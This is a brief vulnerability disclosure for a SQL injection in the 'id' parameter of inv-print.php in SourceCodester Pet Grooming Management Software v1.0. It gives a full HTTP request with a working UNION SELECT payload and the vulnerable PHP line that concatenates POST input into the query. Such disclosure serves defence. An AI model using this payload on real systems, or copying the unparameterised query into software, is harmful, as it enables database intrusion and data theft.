### Key Information - **Vulnerability Title**: SourceCodester Pet Grooming Management Software inv-print.php SQL Injection Vulnerability - **Affected Version**: SourceCodester Pet Grooming Management Software v1.0 - **Test Environment**: PHP 8.4.5, OpenResty 1.21.4.3-3-focal - **CVE Status**: Reported, awaiting CVE ID #### Description The `id` parameter in `/admin/inv-print.php` is vulnerable to SQL injection. #### Payload ```http POST /admin/inv-print.php HTTP/2.1 Host: 192.168.56.134:8081 Referer: http://192.168.56.134:8081/assets/auth.php Cache-Control: no-cache Cookie: PHPSESSID=... User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome ... Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Pragma: no-cache Accept: */* Content-Type: application/x-www-form-urlencoded Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,en-US;q=0.6 Content-Length: 309 id=-5491 UNION ALL SELECT 1,NULL,CONCAT(0x27,user(),0x27),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ``` #### Proof of Concept - Constructed a POST request and sent it to `/admin/inv-print.php`, successfully retrieving injected data in the response. - Code review revealed that the `id` parameter is directly concatenated into the SQL query, leading to the SQL injection vulnerability. #### Relevant Code Snippet ```php $sql = "SELECT * FROM tbl_invoice where id='" . $_POST['id'] . "'"; $statement = $conn->prepare($sql); $statement->execute(); ```